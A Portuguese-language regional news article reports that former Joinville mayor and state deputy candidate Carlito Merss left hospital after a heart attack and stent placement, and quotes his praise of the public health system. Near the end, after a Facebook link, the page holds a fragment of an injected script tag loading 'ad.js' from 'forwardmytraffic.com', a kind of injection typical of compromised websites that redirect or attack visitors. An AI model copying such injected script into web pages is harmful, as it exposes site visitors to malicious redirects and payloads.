InícioDestaqueCandidato a Deputado Estadual Carlito Merss Se Recupera e deixa Hospital

Candidato a Deputado Estadual Carlito Merss Se Recupera e deixa Hospital

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Na manhã desta quarta-feira, o ex-prefeito de Joinville e candidato a deputado estadual pelo PT, Carlito Merrs, ganhou alta do Hospital Regional Hans Dieter Schmidt, onde estava internado desde o início desta semana. Carlito teve um início de infarto na madrugada de segunda-feira, após as comemorações de seu aniversário, no domingo.

 

 

Na madrugada de segunda-feira, Carlito Merss teve um mal estar e foi levado para o Hospital Municipal São José, onde recebeu os primeiros atendimentos. De lá, foi levado por uma equipe do Samu para o Hospital Regional, onde passou por uma angioplastia, com a colocação de um stent.

 

 

Ao deixar o hospital nesta quinta-feira, Carlito agradeceu à equipe de saúde que o atendeu e reforçou sua luta pelo Sistema Único de Saúde (SUS). “Se eu já era um defensor do SUS, hoje eu virei um defensor instransigente do SUS. Graças a isso que eu salvei a minha vida. E devo principalmente a essa equipe, a esses funcionários, que muitas vezes não são reconhecidos, mas lutam para garantir saúde para todos”, afirmou.

 

 

Carlito está em casa com sua família e vai ficar de roupo por alguns dias para sua recuperação. Logo, voltará para sua campanha nas ruas, com moderação.

 

https://www.facebook.com/carlitomerss/… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.